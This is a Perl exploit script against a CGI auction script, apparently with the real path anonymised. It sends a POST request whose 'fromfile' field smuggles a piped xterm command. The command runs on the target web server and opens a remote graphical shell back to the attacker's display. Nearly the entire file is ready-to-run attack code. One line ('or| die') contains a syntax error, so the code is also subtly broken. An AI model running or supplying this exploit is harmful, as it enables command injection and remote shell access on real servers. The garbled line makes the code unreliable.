#!/usr/bin/perl

## This exploit will spawn a xterm from $target to $attacker.

use strict;
use warnings;
use Socket;

if (@ARGV < 3) {
print("Usage: $0 <target> <attacker> <dpy>\n");
exit(1);
}

my($target, $attacker, $dpy, $length, $cgicode,
$agent, $sploit, $iaddr, $paddr, $proto);

($target, $attacker, $dpy) = @ARGV;

if ($dpy !~ /\d/) {
print("dpy must be a number, probably 0\n");
exit(1);
}

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/sub_dir/the_victim_script.pl\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

system("xhost + $target");

$length = 138 + length($attacker.$dpy);

$cgicode =
"flag1=1&fromfile=%7Cxterm+-display+$attacker%3A$dpy%7C&placebid=1&catdir".
"=cat1&username=teleh0r&password=ohbaby&bid=Ihavenomoney&nobiditem=1&sbut".
"ton=BID";

$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# The path to the_victim_script.pl may of course need to be changed.

$sploit=
"POST /cgi-bin/sub_dir/the_victim_script.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$cgicode";

$iaddr = inet_aton($target) or die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) or die("Error: $!\n");
$proto = getprotobyname('tcp') or| die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die("Error: $!\n");
connect(SOCKET, $paddr) or die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) or die("Error: $!\n");
close(SOCKET);

sleep(3);
system("xhost - $target");
print("\nAll done - hopefully you got the flying xterm!\n");
exit(0)